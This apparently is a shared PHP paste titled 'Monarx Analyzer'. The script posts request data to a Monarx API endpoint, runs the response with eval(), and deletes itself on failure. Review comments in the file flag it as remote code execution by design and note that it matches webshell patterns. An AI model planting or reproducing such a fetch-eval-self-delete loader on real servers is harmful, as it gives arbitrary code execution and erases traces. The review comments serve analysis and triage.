willysec_id

Monarx Analyzer

Jul 1st, 2024
PHP 3.97 KB | Cybersecurity | 0 0
  1. <?php
  // Runtime setup for a long-running, web-reachable, one-shot script.

  // Report fatal run-time errors only.
  error_reporting(E_ERROR);

  // Keep running if the HTTP client disconnects, and allow up to 60000 seconds.
  ignore_user_abort(true);
  set_time_limit(60000);

  // NOTE(review): display_errors / display_startup_errors write PHP error text
  // (including file paths) into the HTTP response body. On a script reachable
  // from the internet these are normally off, with errors sent to the log.
  $iniOverrides = [
      'display_errors' => 1,
      'display_startup_errors' => 1,
      "max_execution_time" => 60000,
  ];
  foreach ($iniOverrides as $iniKey => $iniValue) {
      ini_set($iniKey, $iniValue);
  }

  // NOTE(review): wildcard CORS lets a page on any origin send requests to this
  // script from a visitor's browser and read the response. No origin allow-list
  // or caller authentication is visible in this file.
  $corsHeaders = [
      "Access-Control-Allow-Origin: *",
      "Access-Control-Allow-Methods: GET, POST, OPTIONS",
      "Access-Control-Allow-Headers: *",
  ];
  foreach ($corsHeaders as $corsHeader) {
      header($corsHeader);
  }
  12.  
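  /**
   * One-shot site-analysis bootstrap.
   *
   * The constructor reads the caller's JSON request body, adds the SHA-256 of
   * this file, POSTs the result to the Monarx "site-analysis/register" endpoint
   * and stores the response body. run() then executes that response with eval().
   *
   * NOTE(review): this is remote code execution by design. Nothing in this class
   * authenticates the caller, and the downloaded source is not signature-checked;
   * its integrity rests entirely on the TLS connection to the vendor host. The
   * shape of the file (request body -> outbound POST -> eval -> self-unlink) is
   * also what webshell and file-integrity scanners alert on, so an unexpected
   * copy in a web root should be triaged rather than assumed to be vendor tooling.
   */
  final class MonarxSecuritySiteAnalyzer
  {
      /** @var string Raw response body returned by the registration endpoint. */
      private $instructions;

      /**
       * Build the request, contact the endpoint and keep the response for run().
       *
       * Every failure path goes through handleError(), which terminates the script.
       */
      public function __construct()
      {
          $req_body = $this->getRequestBody();

          // Only a JSON object/array can carry the extra key; other JSON values
          // are forwarded unchanged.
          if (is_array($req_body)) {
              $req_body["file_hash"] = $this->getFileHash();
          }

          $endpoint = $this->getEndpoint($req_body);
          $this->instructions = $this->httpPost($endpoint, $req_body);
      }

      /**
       * Map the request's "env" value to the API host.
       *
       * The host is always chosen from a fixed allow-list, so the caller cannot
       * redirect the request to an arbitrary domain. Unknown, missing or
       * non-string values fall back to production.
       *
       * @param mixed $req_body Decoded request body.
       * @return string Registration endpoint URL.
       */
      private function getEndpoint($req_body)
      {
          $subdomains = [
              "mx-prod" => "",
              "mx-stage" => "stage",
              "mx-dev" => "dev",
          ];

          $subdomain = "";

          // is_string() guards array_key_exists(): a nested array in "env" would
          // otherwise raise a TypeError on PHP 8 before any error handling runs.
          if (
              isset($req_body["env"]) &&
              is_string($req_body["env"]) &&
              array_key_exists($req_body["env"], $subdomains)
          ) {
              $subdomain = $subdomains[$req_body["env"]];
          }

          if ($subdomain !== "") {
              $subdomain = ".$subdomain";
          }

          return "https://api$subdomain.monarx.com/v1/intelligence/site-analysis/register";
      }

      /**
       * Read and JSON-decode the raw HTTP request body.
       *
       * A body that is not valid JSON ends the request and removes this file.
       *
       * @return mixed Decoded JSON (arrays for objects).
       */
      private function getRequestBody()
      {
          $input = file_get_contents("php://input");

          if ($input === false) {
              $this->handleError("Failed to read input");
          }

          $decoded = json_decode($input, true);
          if (json_last_error() !== JSON_ERROR_NONE) {
              $this->handleError("Logging off. Goodbye!", true);
          }

          return $decoded;
      }

      /**
       * SHA-256 of this script as it exists on disk.
       *
       * @return string Lower-case hex digest.
       */
      private function getFileHash()
      {
          $digest = hash_file("sha256", __FILE__);

          if ($digest === false) {
              $this->handleError("Failed to load checksum");
          }

          return $digest;
      }

      /**
       * POST $data as JSON to $url and return the response body.
       *
       * The body returned here is later executed by run(), so the transport is
       * pinned down explicitly instead of relying on php.ini / libcurl defaults:
       * certificate and host-name verification on, HTTPS only, no redirects, and
       * only 2xx responses accepted (an error page must never reach eval()).
       *
       * @param string $url  Endpoint URL.
       * @param mixed  $data Value to JSON-encode as the request body.
       * @return string Response body.
       */
      private function httpPost($url, $data)
      {
          $payload = json_encode($data);

          if ($payload === false) {
              $this->handleError("Failed to encode payload");
          }

          $ch = curl_init($url);

          if ($ch === false) {
              $this->handleError("Failed to initialize request");
          }

          curl_setopt_array($ch, [
              CURLOPT_RETURNTRANSFER => true,
              CURLOPT_POST => true,
              CURLOPT_HTTPHEADER => [
                  "Content-Type: application/json",
              ],
              CURLOPT_POSTFIELDS => $payload,
              CURLOPT_USERAGENT => "Monarx Security",
              // Transport hardening for code that will be executed.
              CURLOPT_SSL_VERIFYPEER => true,
              CURLOPT_SSL_VERIFYHOST => 2,
              CURLOPT_PROTOCOLS => CURLPROTO_HTTPS,
              CURLOPT_FOLLOWLOCATION => false,
          ]);

          $result = curl_exec($ch);
          $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
          curl_close($ch);

          if ($result === false) {
              $this->handleError("Failed to connect", true);
          }

          // Same clean-up as the other remote failure paths: do not leave the
          // script in place after the endpoint refused or failed the request.
          if ($status < 200 || $status >= 300) {
              $this->handleError("Unexpected response status", true);
          }

          return $result;
      }

      /**
       * Execute the instructions fetched by the constructor.
       *
       * An empty or rejected response ends the request and removes this file.
       */
      public function run()
      {
          if (empty($this->instructions)) {
              $this->handleError("No instructions received", true);
          }

          if (!$this->validateInstructions($this->instructions)) {
              $this->handleError("Invalid instructions received", true);
          }

          // NOTE(review): eval() on data received over the network. The check
          // above is a type check only, so whatever the endpoint (or anything
          // able to impersonate it) returns runs with the web server's
          // privileges. Verify a detached signature over the body against a
          // pinned vendor public key before this line, and remove the script
          // from the web root as soon as the analysis has finished.
          eval($this->instructions);
      }

      /**
       * Type check on the downloaded instructions.
       *
       * This does not inspect or authenticate the content; any non-empty string
       * returned by httpPost() passes.
       *
       * @param mixed $instructions Response body.
       * @return bool True when $instructions is a string.
       */
      private function validateInstructions($instructions)
      {
          return is_string($instructions);
      }

      /**
       * Emit a JSON error document and terminate the script.
       *
       * @param string $message    Text placed in the "error" field.
       * @param bool   $deleteSelf When true, try to delete this file first.
       */
      private function handleError($message, $deleteSelf = false)
      {
          // Label the body as JSON so clients do not have to sniff it.
          if (!headers_sent()) {
              header("Content-Type: application/json");
          }

          echo json_encode(["error" => $message, "success" => false]);

          if ($deleteSelf) {
              // Best effort, errors suppressed. Once this succeeds the file is
              // gone from disk; web-server access logs and outbound-connection
              // logs are what remains for reconstructing the run.
              @unlink(__FILE__);
          }

          exit();
      }
  }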
  142.  
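  // Entry point: run the analyzer once; on any unexpected failure report a
  // generic JSON error and remove this file.
  $failure = null;

  try {
      $mnx = new MonarxSecuritySiteAnalyzer();
      $mnx->run();
  } catch (Exception $e) {
      $failure = $e;
  } catch (Throwable $e) {
      // PHP 7+: eval() reports malformed or failing code as Error subclasses
      // (ParseError, TypeError, ...), which `catch (Exception)` alone lets
      // through, leaving the script in place with an uncaught fatal error.
      $failure = $e;
  }

  if ($failure !== null) {
      // The underlying message is deliberately not echoed to the client.
      $error_message = "Unknown error occurred";
      echo json_encode(array("error" => $error_message, "success" => false));
      @unlink(__FILE__);
  }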
  151. ?>